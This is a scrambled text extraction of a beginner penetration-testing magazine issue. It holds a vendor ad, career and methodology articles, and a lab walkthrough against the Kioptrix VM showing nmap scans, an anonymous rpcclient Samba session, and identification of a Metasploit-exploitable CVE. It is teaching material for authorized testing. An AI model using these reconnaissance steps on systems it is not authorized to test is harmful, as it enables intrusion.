Cyber Security Auditing Software
Improve your Firewall Auditing As a penetration tester you have have to be an expert exper t in multiple technologies. Typically you are auditing systems installed and maintained by experienced people, often protective of their own methods and technologies. technologies. On any particular assessment testers may have to perform an analysis of Windows systems, UNIX systems, web applications, applications, databases, wireless networking and a variety of network protocols protocols and firewall devices. Any security issues identified within those technologies will then have to be explained in a way that both management and system maintainers can understand. he network scanning phase of a penetration assessment will quickly identify a number of security weaknesses and services running on the scanned systems. This enables a tester to quickly focus on potentially vulnerable systems and services using a variety of tools that are designed to probe and examine them in more detail e.g. web service query tools. However this is only part of the picture and a more thorough analysis of most systems will involve having administrative access in order to examine in detail how they have been configured. In the case of firewalls, switches, routers and other infrastructure devices this could mean manually reviewing the configuration files saved from a wide variety of devices. Although various tools exist that can examine some elements of a configuration, the assessment would typically end up being a largely manual process. Nipper Studio is a tool that enables penetration testers, and non-security professionals, to quickly perform a detailed analysis of network infrastructure devices. Nipper Studio does this by examining the actual configuration of the device, enabling a much more comprehensive and precise audit than a scanner could ever achieve. www.titania.com
Cyber Security Auditing Software
Improve your Firewall Auditing As a penetration tester you have have to be an expert exper t in multiple technologies. Typically you are auditing systems installed and maintained by experienced people, often protective of their own methods and technologies. technologies. On any particular assessment testers may have to perform an analysis of Windows systems, UNIX systems, web applications, applications, databases, wireless networking and a variety of network protocols protocols and firewall devices. Any security issues identified within those technologies will then have to be explained in a way that both management and system maintainers can understand. he network scanning phase of a penetration assessment will quickly identify a number of security weaknesses and services running on the scanned systems. This enables a tester to quickly focus on potentially vulnerable systems and services using a variety of tools that are designed to probe and examine them in more detail e.g. web service query tools. However this is only part of the picture and a more thorough analysis of most systems will involve having administrative access in order to examine in detail how they have been configured. In the case of firewalls, switches, routers and other infrastructure devices this could mean manually reviewing the configuration files saved from a wide variety of devices. Although various tools exist that can examine some elements of a configuration, the assessment would typically end up being a largely manual process. Nipper Studio is a tool that enables penetration testers, and non-security professionals, to quickly perform a detailed analysis of network infrastructure devices. Nipper Studio does this by examining the actual configuration of the device, enabling a much more comprehensive and precise audit than a scanner could ever achieve. www.titania.com
With Nipper Studio penetration testers can be experts in every device that the software supports, giving them the ability to identify device, version and configuration specific issues without having to manually reference multiple sources of information. With support for around 100 firewalls, routers, switches and other infrastructure devices, you can speed up the audit process without compromising the detail.
You can customize the audit policy for your customer’s specific requirements (e.g. password policy), audit the device to that policy and then create the report detailing the issues identified. The reports can include device specific mitigation actions and be customized with your own companies styling. Each report can then be saved in a variety of formats for management of the issues. Why not see for yourself, evaluate for free at titania.com
Ian has been working with leading global organizations and government agencies to help improve computer security for more than a decade. He has been accredited by CESG for his security and team leading expertise for over 5 years. In 2009 Ian Whiting founded Titania with the aim of producing security auditing software products that can be used by non-security specialists and provide the detailed analysis that traditionally only an experienced penetration tester could achieve. Today Titania’s products are used in over 40 countries by government and military agencies, financial institutions, telecommunications companies, national infrastructure organizations and auditing companies, to help them secure critical systems. www.titania.com
CONTENTS
HOW TO START
Dear PenTesters!
W
e are proud to announce a new line of our Magazine – Pen-
06 Basics of Pentest: A Lesson for Beginners By Nishant Raman
Test StarterKit. It's a magazine dedicated especially (but not
How to Start a Pentest is a big concern and question in the mind of any beginner who is going to conduct a pentest for the first time. Knowing about the various tools is always an interesting part for any ethical hacker but to begin any pentesting assignment you should have a better approach and plan.
only) for newbies and pentesting enthusiasts, who would like to gain more experience and knowledge. Conducting the penetration test for the first time might be a big concern for some of you who haven't tried it yet. That's why we open this issue with the section: 'How To Start', where you will find an article 'Basics of PenTest' by Nishant Raman, who describes there how to start a penetration test. Yury Chemerkin, our expert who made one of the covers of PenTest Magazine, in his article gives some tips
10 Pentester Career: How to Begin? By Yury Chemerkin
on how to begin a pentester career. The section closes with Fran-
You will learn what to take into consideration when assessing you pentest knowledge. Is it degree, skills, certifications or maybe knowledge of programming languages? Moreover, you will get answers to questions like: What to learn or what to do to become a pentester? How to improve your pentester skills? Finally you will learn what skills each pentester should possess and how to gain them.
cesco Perna's article 'Professional Penetration Testing: How to Get Started', where he presents security testing methodologies. Next, you will find an article 'Penetration Testing with Nessus' by Dan Robel. In there, you will learn what kind of troubles penetration testers have to face nowadays. From the article 'BackTrack for Pentesting?' by Lloyd Wilke, you will get to know that using Backtrack makes it easy for a pentester to get his/her hands on the required tools to do a good job in finding security exploits in the systems. In 'Network Scanning: The Basic Tools' article, Enrique Sanchez explains the basic techniques used under the hood of great
12 Professional Penetration Testing: How to Get Started?
scanners such as nmap and so forth. In his day-to-day job, author
By Francesco Perna
is a member of Accuvant LABS Enterprise Attack and Penetration
The first approach to penetration testing activities seems like black voodoo arts to anyone who hasn't ever considered the computer security problems. The truth is that in these kind of activities no magic art is involved and no supernatural power is necessary in order to proceed. All you need for successful penetration testing is a fully functional "/dev/brain", very specific technical preparation, strong knowledge of security testing methodologies, a little bit of fantasy and a lot of practice.
Testing team. Than, you will have a chance to acquire knowledge about Blind Command Line Injection (BCLIi) while reading Chris Duffy's article. From 'CSRF Testing and its Protection Using RequestRodeo' contributed by Nitin Goplani, you will learn more about Cross Site Request Forgery (CSRF), which is one of the most common attacks on the Internet nowadays. Hitesh Choudhary, an ethical hacker, in his 'Python for Coders and Pentesters' article, demonstrates how to write a web crawler in Python. In the section 'Let's Talk About Security' you will find an article entitled: 'Pentesting a Nation – Is Australia Safe From Attack?',
PENTESTING WITH TOOLS 20 Penetration Testing with Nessus
where thanks to its author – Colin Renouf, you will have an opportu-
By Dan Robel
nity to look at some of the wider issues related to penetration testing
In the last 10 years, cybersecurity has become a household word, and due to the growth of critical infrastructure and an exponential increase in the related threat of cyber-attack, dominates every conversation we have about securing this critical infrastructure. From this article you will learn what troubles have to face penetration testers nowadays.
and security – the “A” (availability) in the CIA security triad. Last but not least, is an interview with Rod Soto, the winner of last year's Black Hat hacking competition, a security researcher and a board member of HackMiami. We are sure you will find this interview as well educative as inspiring. We hope you will enjoy your reading! Kamil Sobieraj & PenTest Team
26 BackTrack for Pentesting? By Lloyd Wilke BackTrack makes it easy for a pentester to get his/her hands on the required tools to do a good job in finding security exploits on systems. It also allows the
StartKit 01/2013(01)
Page
4
http://pentestmag.com
CONTENTS
so-called “script kiddies” access to professional tools that is so easy to use that they can exploit systems without understanding what has been achieved.
32 Network Scanning: The Basic Tools By Enrique Sanchez This article will try to explain the basic techniques used under the hood of great scanners such as nmap and so forth. This will allow the reader to have not only a better understanding of how the network scanners work on the discovery phase, but also be able to implement their own scanners or use other programs to gather this information in the case nmap or other tools would trigger IDS signatures and the engagement requires not being caught by it (Red Team).
TEAM Editor in Chief: Ewa Dudzic
[email protected] Managing Editor: Kamil Sobieraj
[email protected] Associate Editors:
Patrycja Przybyłowicz
[email protected]
POTENTIAL ATTACKS & DEFENSE METHODS
Ewa Duranc
[email protected]
46 Blind Command Line Injection By Chris Duffy
Zbigniew Fiołna
[email protected]
Blind Command Line injection (BCLIi) is when a web application allows operating system commands to be executed through it with no confirmation of execution. BCLi is typically found on poorly coded applications that allow access to files or data through a web interface. Read this article to get more information about the BCLIi.
Editorial Advisory Board: Jeff Weaver, Rebecca Wynn Betatesters & Proofreaders: Vaman Amarjeet, Gregory Chrysanthou Balogun, Ayo TayoBalogun, Jeff Weaver, Amit Chugh, Pinto Elia, Ewa Duranc, Jeff Smith, Julian Estevez, Rod MacPherson, Scott Christie
50 CSRF Testing and its Protection Using RequestRodeo By Nitin Goplani
Senior Consultant/Publisher: Paweł Marciniak
Cross Site Request Forgery (CSRF) is one of the most common attacks on the Internet today. The attackers find it easy to exploit it as it does not require any authentication information, session cookies but only the user to be authenticated to the application. Furthermore, it is possible on every platform and it does not matter which authentication type application uses.
CEO: Ewa Dudzic
[email protected] Art Director: Ireneusz Pogroszewski
[email protected] DTP: Ireneusz Pogroszewski Production Director: Andrzej Kuca
[email protected]
56 Python for Coders and Pentesters By Hitesh Choudhary
Publisher: Hakin9 Media
02-682 Warszawa, ul. Bokserska 1 Phone: 1 917 338 3631
Python programming language was gift to Web world by Guido van Rossum. Most of the time InfoSec evangelists need to write their Proof Of Concept [POC], we need to automate our attacks or customize some of our tools and these tasks can create a lot of headaches.
www.pentestmag.com
Whilst every effort has been made to ensure the
high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage.
LET'S TALK ABOUT SECURITY
All trade marks presented in the magazine were
58 Pentesting a Nation – Is Australia Safe From Attack?
used only for informative purposes.
By Colin Renouf This article looks at some of the wider issues related to penetration testing and security – the “A” (availability) in the CIA security triad – and how an attack on inadequate national infrastructure could impact a global system.
All rights to trade marks presented in the magazine are reserved by the companies which own them.
DISCLAIMER! The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.
INTERVIEW 62 Interview with Rod Soto By PenTest Team Rod Soto is a security researcher and board member of HackMiami. He is a regular speaker at hacking conferences all over the country on the topics of penetration testing tools and methods, as well as the topic of digital civil liberties. He will tell us about his experience in the pentest field.
StartKit 01/2013(01)
Page
5
http://pentestmag.com
HOW TO START
Basics of Pentest: A Lesson for Beginners This article is written for beginners who have just started their career in the security domain as pentesters and are planning to become a successful ones. 'How to Start a Pentest' is a big concern and question in the mind of any beginner who is going to conduct a pentest for the first time.
K
nowing about the various tools is always an
interesting part for any ethical hacker but
to begin any pentesting assignment you should have a better approach and plan. This article will focus in depth on what approach should
be taken to start a pentest.
Scenario Very often, at the beginning of a pentest, you will face two types of situations.
Let’s have a closer look at the Methodology of a pentest (see Figure 1).
Step 1: IPs If performing the scenario II, you have only email ID or Domain name with you. From here the very first thing you need to find out is the IP address registered with the organization for which you are conducting the pentest activity. To get the IP address' details you can use various tools and web-
• The Organization who wants to conduct the pentest on their network provides you with just a list of IP Addresses. OR • The Organization provides you with email address or domain name only. Considering both of the scenarios, you will have bunch of queries in your mind: how to start, what to do, what would be the rst step, etc. So without examining your zeal let's see 'How to Start a Pentest'
Approach When knowing about both the scenarios, the very first step is to go through the methodology in order to set up the positive flow of your pentest activity.
StartKit 01/2013(01)
Page
Figure 1. Methodology of a pentest
6
http://pentestmag.com
sites, such as: www.whois.net , www.Yougetsignal. com, www.whois.sc , www.dnsstuff.com etc. After getting the IP address' details you will have another question in your mind: should I do the pentest on all the registered IPs? The answer is 'NO'. You cannot decide at that moment. You will have to find all the active or usable IPs first. Remember
that most organizations keep some of their IPs as spare ones, so there is a very big possibility that you can get less number of active IPs than registered IPs. To find out all the active IPs you can use various IP scanner tools, such as: Angry IP (see Figure 2), superscan, Hping , etc. Note that to get the exact number of active IPs you need to perform multiple scans because there is a possibility that, during a scan, some of the devices can be down or inactive. This should allow you to gather the information about all the active IPs. To get further information about the organization network infrastructure you can also visit the websites with job offers and analyze the requirements related to the organization.
Example If organization has posted their requirement on job website for Oracle DBA and Fortigate firewall specialist, this means that they use oracle database and Fortigate firewalls so you can prepare your test plan accordingly and try to get more information about this in the next steps of pentest.
Step 2: Port Scanning This step is very important during the pentest activity. The previous one let you find the active IPs, now it is turn to perform the Port Scanning on those IPs. During port scanning you will not only gather the information about ports but most probably you will also get some details about services, Operating System, version of OS and
services. For this purpose you can use tools like ZenMAP (see Figure 3), NMAP (see Figure 4), and SuperScan , etc.
When having the information about open ports, services' and Operating Systems' versions gathered, you need to do some exercise and R&D to
collect, using your skills, some other details about the Operating System and services.
Step 3: Vulnerability Scan Now you have to do the vulnerability scanning of each IP address. This will allow you to get information about the vulnerabilities pertaining to the Op-
StartKit 01/2013(01)
HOW TO START erating System, services, and application running on devices or servers associated with active IPs. For this purpose you can use network and application vulnerability scanner tools like Nessus, Retina, AppScan, Accunetix , etc. Once the scanner has generated a report you need to analyze it deeply and understand the
Step 4: Research and Exploitation
weaknesses or loop holes found in the report.
hands on experience on Metasploit Framework and Backtrack.
This step is a bit difficult. You need to perform exploitation of loop holes which you have found dur-
ing steps 2 & 3. The process of exploitation will let you compromise the server or device and gain access to it. To get this accomplished, you need to have deep
Suggestions To be a good pentester you should have deep theoretical as well as practical concept. You need to get as much experience as possible with some of the tools mentioned (NMAP, Metasploit,
Backtrack, vulnerability scanner tools, etc.). You should be active on information security related blogs and spend good amount of time on R&D
and vulnerabilities research. You need to keep yourself up to date regarding the zero day vulnerabilities and exploits. And never forget that it is
your zeal of learning that will play the key role in your success. Figure 2. Angry IP Scanner
Figure 3. ZenMap Port Scanner
NISHANT RAMAN Nishant Raman is the Founder and Chairman of CydCon IT Solutions Pvt. Ltd. New Delhi India. He has experience in ethical hacking and web ap plication pentesting. Being a security consultant for the last seven years he is continuously helping IT, Banking and non IT organization to improve their applications and network security. He is working not only for the domestic clients, but is providing his consultancy all over the world.
Figure 4. Nmap Port Scanner
StartKit 01/2013(01)
Page
8
http://pentestmag.com
Pescara Via Colle Scorrano, 5 65100 Pescara F. +39 0857992241
[email protected]
Roma Piazza G. Marconi,15 00144 Roma T. +39 0632803612 F. +39 0632803283
www.quantumleap.it
HOW TO START
Pentester Career: How to Begin? Someone starts with talking about degree, another says that nothing except fundamentals matters. You can get some significant part of whole knowledge before college even or do not anything useful after degree even.
T
hat is not a talk about how your degree af fects your skills, it does not affect, because the practical skills might have something with
Besides, do not forget you should not only develop something but pentest too. It does not mean you
'fundamentals' if they are on the same way and lead you to the same goal. Not every country has such
out-of-box tools or solutions you have to learn and
educational institutes (maybe Germany has). You are allowed to argue against both sides or choose your own where there is a place to solve different problems instead of misplacing them. This case is often extended by certifications; it matters, no doubt,
especially when you know that someone who hires you looks for it. However, you may find another way to tell them you can manage with such projects that depend on your additional skills such as programming. I mean you can develop your own tools/exploit by yourself, participate in open-source groups that aims it too, you can improve some tool/exploitation mechanism or automatize it, mix several tools, redevelop it even. It helps to understand how OS
should stop to improve your skills; there are many use, like BackTrack. It must be a need to improve or custom them in order to network, system or other specifications. Being a part of team, like Hacker for Charity (http://www.hackersforcharity.org/ ), helps to collect all skills among system security, network security, application security, etc. On the another hand, getting forensics skills may help too. There-
fore, learning and practicing with home networks, corporate sandboxes, bypassing NAC, VLANs and finding loopholes in isolated segments that helps
understanding stacks, buffer and memory and their vulnerabilities. In addition, you can learn specific technology such AVR: this kind of programming in-
volves a C/C++ knowledge as well.
components link and work together as well as break
Anyway, first steps on this field might involve reading books, but almost all of books (except Syn-
into system. In course of debates which languages
gress Publishing house) are rewritten, redesigned
must be learnt, there are two kinds that depend on OS (under Windows OS – C/C++, Assembler, under
of each other that brings old techniques, and old tools. So, it is better to find books such as shell -
Linux/RedHat/CentOS – Python, Ruby). However, it
coders and grayhat-coders books and Pentest
does not mean you should limit yourself to these languages, as a software develops with many other languages, software may have popular add-ons written by someone who prefers .Net or have to use it.
guidelines (e.g. http://www.pentest-standard.org , http://www.vulnapps.com/ ) and standards (NIST
StartKit 01/2013(01)
SP 800-42). As said earlier, you can not focus on certain language, software or technology not to
Page 10
http://pentestmag.com
end with pure knowledge. No one loves Delphi but enough tools to research applications implement Delphi libraries (and written too). You should col lect information about every technology, system, software from any possible sources:
• Infosecurity blogs, news (like http://www.vulnapps.com/ or http://exploit-exercises.com/ ) • Books and ebooks (like The Art of Software Security Assessment, or The Art of Exploitation) • Vulnerabilities domains (like http://www.exploitdb.com/ ) • security conferences/events (each possible, not only top known such DefCon) • templates and charts (http://pentestmonkey. net/category/cheat-sheet ) • special guidelines and frameworks (like OffSec guidelines) It is quite important to have all of these (and not only them) skills, because the key difference between such tester and someone else is an abil-
ity to answer and explain vector attacks, potential ways to attacks, and discreet information you have per each who you interact. It means don’t overload CEO with full-detailed technical reports generated
by Nessus or another tool. As nal thoughts, you should have different broad skills on • Networks solutions (software, protocols, and hardware); • Techniques of attacking and defensing of IDS, Firewalls, AV, embedded and third party security software;
• Top known tools and software to gathering data; • Forensics and intelligence techniques to get evidence; • Human security techniques (social engineering
and physical security); • Participating at the CTFs and conferences; • Simply be involved to gain and share knowledge with smart guys;
Good luck,
YURY CHEMERKIN Currently in the postgraduate program at RSUH on the Cloud Security thesis. Experience in Reverse Engineering, Software Programming, Cyber & Mobile Security Research, Documentation, and as a contributing Security Writer.
StartKit 01/2013(01)
HOW TO START
Professional Penetration Testing: How to Get Started The first approach to penetration testing activities seems like black voodoo arts to anyone who hasn't ever considered the computer security problems. The truth is that in these kind of activities no magic art is involved and no supernatural power is necessary in order to proceed.
A
ll you need for successful penetration testing is a fully functional /dev/brain , very specific technical preparation, strong knowledge of security testing methodologies, a little bit of fantasy and a lot of practice.
Many think that Penetration Testing is an activity reserved only to the hackers. This is partially true: a good hacker could be a penetration tester but penetration tests' activities are a complete different
story from hacking. When talking about hacking, there's no applicable rule, the limit to the "activity" resides only in the hacker's imagination. An hacker doesn't follow any public available methodologies, doesn't need to be clear in the vulnerability explanation, and also doesn't have to write reports!
Hackers just hack to reach their own objectives in the way they prefer. Contrary to hacking, made for fun, for research or in any of its forms, penetration tests are meant to companies and organizations that need either to verify if their security level meets certain requirements (state regulations,
In this article you will learn some of the basis of penetration testing. First of all, a little bit of penetration tests' theory will be discussed, then some basic techniques used during a penetration test will be showed through pratical approach applied to system vulnerable by design. I have assumed that the reader is familiar at least with the basic concepts of security and TCP/IP. The practical examples are made using the commonly available security tools shipped with the Linux distro
BackTrack 5 R3[1] against kioptrix vm (level 1) [2]. Although the BackTrack isn't a new trend in penetration testing distros, we decided to use it due to large number of tutorial that a beginner can find on the Internet. Obviously, you don't have to use it. If you feel more comfortable us-
ing Kali, Backbox, Debian, Slackware, Ubuntu, a hundred of linux distributions, OSX or Windows, then use it.
What is a Penetration Test and what is it for
company policy, international standards and so on) or to evaluate risks related to the findings. That's A penetration test could be defined as a method why, in order to be effective, a penetration test activity must be executed with formalisms understood by the Customer, both in the test execution and in the way the identified vulnerabilities are reported in.
StartKit 01/2013(01)
used to evaluate the security level of a set of assets. The goal of a penetration test, despite the
name, is no longer breaking or penetrate into a system. Instead, it is to identify, through a scientific methodology, the security level of the evaluated
Page 12
http://pentestmag.com
assets. I'm talking about asset instead of computer, network, and system because, in a 'holistic' per -
OSSTMM [3]
spective, a penetration test isn't necessary intended for technological stuff. Below are listed the main advantages of following a scientific methodology:
Manual (OSSTMM) is a peer-reviewed manual of
• penetration tests are conducted thoroughly and the results are consistent: if anyone repeat the penetration test using the same methodology on the same asset, he or she should (net er-
rors) obtain the same results; • results leave no room for interpretation and what is asserted can be demonstrated through the evidences collected during the analysis. Furthermore, penetration test results are measurable in a quantitive way that depends from the adopted methodology; • posture towards penetration test comply with the law. This is really important, especially if something goes wrong. It's crucial that at least the following legal aspect are met: • a penetration test may only occur after a clear analysis of both the regional laws for the security professional and for the Company or the Organization being tested; • a penetration test may only occur after the signature of a written permission by the Customer. I used the term 'written permission' because a permission sent by e-mail, and, in some countries, even by fax, isn't enough to protect and your Company from lawsuits. Consider
consulting a lawyer to dene the terms of the written permissions.
The Open Source Security Testing Methodology security testing and analysis released by the ISECOM (the Institute for Security and Open Methodologies). The OSSTMM concern operational security and propose a scientific method to measure
how well security works. Beside technical aspects, OSSTMM keeps in serious consideration the legal and ethical aspects related to security tests. The ISECOM provide also a set of professional certifications related to the methodology;
ISSAF [4] The Information Systems Security Assessment Framework (ISSAF), relased by OISSG (Open Information Systems Security Group) provide validation for bottom-up security strategies, such as penetration testing as well as top-down approaches,
such as the standardization of an audit checklist for information policies;
OWASP [5] The Open Web Application Security Project
(OWASP) testing guide, relased by the OWASP Project, is a methodology focused on web applications penetration testing. The OWASP method-
ology propose also its own risk analysis strategy. The choice of methodology is really important as it deeply affects the way you work: it is really im portant to deeply understand a chosen methodology before applying it. Each methodology requires different way of proceeding, collecting information,
report the findings and evaluate the related risks. Remember that during a penetration test the security professional is legally responsible for his action so, quoting a friend of mine, 'Cover your ass!'.
There are several kinds of penetration tests, and each one's methodology is different from the other. The common denominator between these different methodologies is the information provided to a security professional and customer's employees: the less information is shared, the more the test will be reliable in simulating a real threat.
Penetration Test Methodologies There are several methodologies to conduct a successful penetration test. Depending on the methodology the different steps of the penetration test, such as posture review, report of the findings or
To clarify, the previously listed methodologies are only an example and I don't want to imply that they are better than other existing methodologies: every methodology has its own strengths and weaknesses and it is your responsibility to understand if it fits your needs.
Rules of Engagement Methodologies define a way to approach a penetration test safely and professionally. Depending on the adopted methodology the way to approach the penetration test may be slightly different. Regardless of the adopted methodology, please be sure to comply at least with the following rules of engagement:
risk evaluation may vary. To my knowledge, the
• Penetration test scope denition: you need to
most widely used methodologies are the following ones:
verify with the Customer the scope of the penetration in terms of number of targets, accept-
StartKit 01/2013(01)
Page 13
http://pentestmag.com
HOW TO START able practices, involved parties and time win-
necessary effort and the involved perimeter;
should contain all the issues discovered during the penetration test along with the evidences and the necessary steps to reproduce these issues. The report should also contain a practical solution to the reported issues. The report must be transmitted, maintaining its condenti-
• Contract terms denition: The contract should
ality end-to-end, and the customer must know
include also a line of communication and emergency contacts. One of the most important aspects in professional penetration testing is the
the implications of uncontrolled diffusion of the information inside it.
dow. During the scope denition you should be able to identify any obviously insecure or unstable system and should avoid to test them. It
is crucial to have this information to dene the
condentiality. Regardless the existence of a
Pentest Simulation Scenario
non-disclosure agreement, you must not reveal any information acquired from the customer nor the results of testing to third parties not identied by the customer as referents for the pene tration test. Although, the penetration test conducted professionally should not be destructive, you need to clearly state in the contract dangers, risks, and limitations related to the penetration test activities. The contract must include the written authorization to proceed with the security tests. Be sure to include inside the written authorization signed by the Customer at least the information related to the perimeter, the acceptable practices, the time window and the source of analysis (like the originating IP Address for the attack simulations, telephone num-
Let's start with a simulation of a penetration test. I am assuming at this point that all the legal and non technical aspect are sorted out (such as the Customer having signed the contract and written authorizations). The scope of this simulated penetration test is a single system connected to the
bers used during war dialing, etc.); • Technical activities: rst of all, and this is a golden and inviolable rule, you must operate respecting the law. Remember that you're the only responsible of that. Trace all your activities, both on your system and on the Customer's ones, in order to protect yourself in case of troubles. Keep every information acquired during the test safe and secure in order to guar-
Customer's network and your task is to start with an analysis of the system. In my simulation the target
(that is the kioptrix) has IP address 192.168.1.105 and my system (that is BackTrack) has IP address 192.168.1.107.
Penetration Test Simulation: Setup the Logging The first activity in a test is to setup the logging
environment for both the shell and network traffic. In my setup I connect through SSH to my BackTrack and I directly log all the commands sent to the shell. On a Windows system you can use PuT-
TY [6], or something equivalent, to log the whole session. Figure 1 shows how to configure PuTTY to enable session logging.
antee condentiality. Don't be destructive and don't carry out any intentional denial of ser-
vice attack against the target. Never use tools that you don't know properly: you can cause potential damages and this is unacceptable. If in doubt about the eventuality of causing dam-
age with a test, inform the Customer rst and obtain the authorization, preferably in written form, to carry out the specic test. If you dis cover a breach during your activities, suspend immediately the penetration test and inform the Customer. Last but not least, at the end of a penetration test, clean the targets from anything that you may have installed during the analysis; • Reporting: the report is what, eventually, summarizes the outcome of a penetration test. It
StartKit 01/2013(01)
Figure 1. PuTTY session logging
Page 14
http://pentestmag.com
Under Linux and Unix-like systems it is possible to log the session using the OpenSSH [7] client and the tee command, as I show in Listing 1. Once logged into the BackTrack host, I suggest
In this specific case, because the systems are directly connected, I only log the network traffic in-
you to customize your shell prompt to include information such as the day and time. This is a useful trick to piece together the time-line of the simulated attack. Listing 2 shows how to setup this cus-
After these preliminary steps, it is time to proceed with the analysis.
tomized prompt using the bash [8] shell. The next step is to setup the logging of network traffic; for this task I use the tcpdump utility. Usually I log the traffic of the whole target's subnet in order to identify any spurious or unexpected response.
volving the kioptrix system. Listing 3 shows how to use tcpdump to log the network traffic.
Penetration Test Simulation: Services Enumeration I am assuming here that your familiarity with the TCP/IP protocol suite. The first step to analyze the security of the target is to identify the services that it exposes. To identify these services I use
Listing 1. SSH session logging $ ssh pentest@192 .168.1.107 | tee ~/ssh-output.log
Listing 2. Custom prompt $ export PS1="[\d \t \u@\h:\w]$ "
Listing 3. Network traffic logging> $ tcpdump -i eth0 -n -s0 -w PT-LOG.pcap host 192.168.1.105
Listing 4. TCP ports/services enumeration $ nmap -sS -sV -P0 -O -n -p 1-65535 192.168.1.105 Starting Nmap 6.25 ( http://nmap.org ) at 2013-04-24 01:58 CEST Nmap scan report for 192.168.1.105 Host is up (0.00030s latency). Not shown: 65529 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99) 80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b) 111/tcp open rpcbind 2 (RPC #100000) 139/tcp open netbios -ssn Samba smbd (workgroup: MYGROUP ) 443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b) 32768/tcp open status 1 (RPC #100024) MAC Address: 08:00:27:A9:9E:29 (Cadmus Computer Systems ) Device type: general purpose Running: Linux 2.4.X OS CPE: cpe:/o:linux:linux_kernel:2 .4 OS details: Linux 2.4.9 - 2.4.18 (likely embedded ) Network Distance: 1 hop OS and Service detection performed . Please report any incorrect results at http:/ /nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.02 seconds
StartKit 01/2013(01)
Page 15
http://pentestmag.com
HOW TO START the nmap port scanner. In the specific, I perform a full port scan with the SYN scan technique, this in order to identify also services that are on nonstandard ports. Listing 4 shows how to use nmap
to perform this task.
A brief analysis of the port scan results shows us that the target has at least an outdated service, for example, the Apache daemon listening on ports 80 and 443, and at least a security misconfiguration, since the ssh daemon listening on port 22 is
After identifying the TCP services exposed by the target, it is time to discover if it exposes any UDP service. Differently from the TCP case, to identify whether or not an UDP port is open, nmap has to send active solicitations using commands pertinent to the specific service, supposed to be resident on a certain port. This means that if a service is exp osed on a non standard port, or if the service does not recognize the requests made by the port scanner, nmap will report the port as closed\filtered. This also means
configured to support the version 1 of the protocol.
that it makes no sense to scan the whole udp port
The process of identifying target's vulnerabilities can be simplified by using a vulnerability scanner. The vulnerability scanner which I use in this simulation is OpenVAS[10] and all the described actions are submitted to the engine trough the web interface. Please, refer to the manual to set up properly this vulnerability scanner. To start a scan you have first to define the target. This could be done through the menu "Configuration -> Targets"
range. The way I perform the UDP scan is shown
in Listing 5.
It is furthermore possible to see in the results that the target exposes the netbios protocol using the samba daemon. Depending on the methodology,
the port scan results are also useful for the risk evaluation. These results are the starting point for further analysis aimed at identifying vulnerabilities of the target.
Penetration Test Simulation: Vulnerabilities Identification
(Figure 2). After the target creation I proceed with the s can. In order to start a vulnerability scan, you have first to create a task through the menu "Scan Manage-
ment -> New Task" (see Figure 3) and then start the created task (see Figure 4). In a real world sceFigure 2. Target Creation
nario you must also verify that the selected scan-
Listing 5. UDP ports/services enumeration $ nmap -sU -P0 -O -n 192.168.1.105 Starting Nmap 6.25 ( http://nmap.org ) at 2013-04-24 01:37 CEST Nmap scan report for 192.168.1.105 Host is up (0.00035s latency). Not shown: 996 closed ports PORT STATE SERVICE 111/udp open rpcbind 137/udp open netbios -ns 138/udp open|ltered netbios -dgm 32768/udp open|ltered omad MAC Address: 08:00:27:A9:9E:29 (Cadmus Computer Systems ) Too many ngerprints match this host to give specic OS details Network Distance: 1 hop OS detection performed . Please report any incorrect results at http:/ /nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1086.79 seconds
StartKit 01/2013(01)
Page 16
http://pentestmag.com
ning policy does not contain any check that could
work scan I was able to identify the samba work -
cause a Denial of Service. In this test case, the default settings are enough. The vulnerability scan
group name, MYGROUP, so I will try to connect to the daemon using an anonymous session while
will take some time to be completed, what means
recording the network traffic with tcpdump. Listing
that this is a great while for a coffee. Analyzing the output of the vulnerability scan, it is
6 shows the rpcclient command line options which I use to connect to the samba daemon. As shown in Listing 6 the connection is success-
possible to identify 69 security issues that require manual verification. At this point, for each identified vulnerability, it is necessary to check the listed ref erences, in order to spot any potentially exploitable service. Note that the results provided by OpenVAS are not complete: for example, the vulnerability scanner did not find any vulnerability affecting the samba daemon. Besides the specificity of this test case, the steps that are involved in identifying vulnerabilities are similar to the ones described in this example, also if you use a different scanner. Another way to identify vulnerabilities is based on the banners exposed by the services enumerated during the port scan and on the information that can be obtained by inspecting the network traffic. Basically it is possible to find on the Internet public disclosed vulnerabilities for the services identified on the target. This method, when applied in a real scenario, could
ful. It is thus the time to analyze the network traffic using Wireshark[11]. Using the display filter "frame contains Samba" it is possible to identify the ver-
sion running on the target: Samba 2.2.1a. Figure 5 shows the captured packet that contains this juicy information. Using the cvedetails[12] website it is possible to look for any remotely exploitable vulnerability for samba version 2.2.1a. In this case there is a vulnerability, that is CVE-2003-0201, that is remotely exploitable using a metasploit module. Figure 6 shows the search results.
Penetration Test Simulation: Vulnerability Exploitation Exploiting the vulnerability is straightforward. Thanks to metasploit [13], it is possible with just few com-
take a long time, particularly if you have to analyze
Listing 6. rpcclient connection to samba daemon
a lot of targets. Anyway, it could be useful in some cases, especially when the vulnerability scanner fails to identify the vulnerabilities for you. To demonstrate this method I proceed with the analysis of the vulnerabilities related to the samba daemon. First of all it is necessary to generate some traffic directed to the samba daemon. During the net-
$rpcclient -I 192.168.1.105 -w MYGROUP -U "%" rpcclient $>
Figure 5. SMB Packet containing samba daemon version information
Figure 3. Task Creation
Figure 4. Vulnerability Scan Start
StartKit 01/2013(01)
Figure 6. CVE-2003-0201 vulnerability details
Page 17
http://pentestmag.com
HOW TO START
References [1] [1] BackTrack 5 R3 – http://www.backtrack-linux.org/downloads/ [2] Kioptrix VM Level 1 – http://www.kioptrix.com/dlvm/Kioptrix_Level_1.rar
[7] OpenSSH – http://www.openssh.org/ [8] Bash reference manual – http://www.gnu.org/software/bash/ manual/bashref.html [9] nmap – http://nmap.org/ [10] OpenVAS – http://www.openvas.org/ [11] Wireshark – http://www.wireshark.org/
